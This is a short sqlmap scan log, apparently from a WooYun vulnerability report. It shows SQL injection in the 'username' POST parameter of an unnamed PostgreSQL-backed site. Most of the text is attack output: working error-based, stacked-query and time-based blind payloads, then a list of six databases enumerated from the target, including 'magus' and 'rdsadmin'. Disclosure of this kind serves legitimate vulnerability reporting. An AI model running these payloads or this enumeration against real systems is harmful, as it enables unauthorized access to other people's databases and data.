WooYun.org

sqlmap identified the following injection points with a total of 97 HTTP(s) requ
ests:
---
Place: POST
Parameter: username
    Type: error-based
    Title: PostgreSQL AND error-based - WHERE or HAVING clause
    Payload: username=TQtq' AND 9980=CAST((CHR(58)||CHR(100)||CHR(97)||CHR(100)|
|CHR(58))||(SELECT (CASE WHEN (9980=9980) THEN 1 ELSE 0 END))::text||(CHR(58)||C
HR(112)||CHR(97)||CHR(113)||CHR(58)) AS NUMERIC) AND 'VFFu'='VFFu&pass=
    Type: stacked queries
    Title: PostgreSQL > 8.1 stacked queries
    Payload: username=TQtq'; SELECT PG_SLEEP(5)--&pass=
    Type: AND/OR time-based blind
    Title: PostgreSQL > 8.1 AND time-based blind
    Payload: username=TQtq' AND 4058=(SELECT 4058 FROM PG_SLEEP(5)) AND 'Uqqj'='
Uqqj&pass=
---
do you want to exploit this SQL injection? [Y/n] n
[19:00:08] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 58 times
[19:00:08] [INFO] you can find results of scanning in multiple targets mode insi
de the CSV file 'D:\Python27\sqlmap\output\results-06192015_0658pm.csv'
[*] shutting down at 19:00:08

available databases [6]:
[*] magus
[*] magusc
[*] postgres
[*] rdsadmin
[*] template0
[*] template1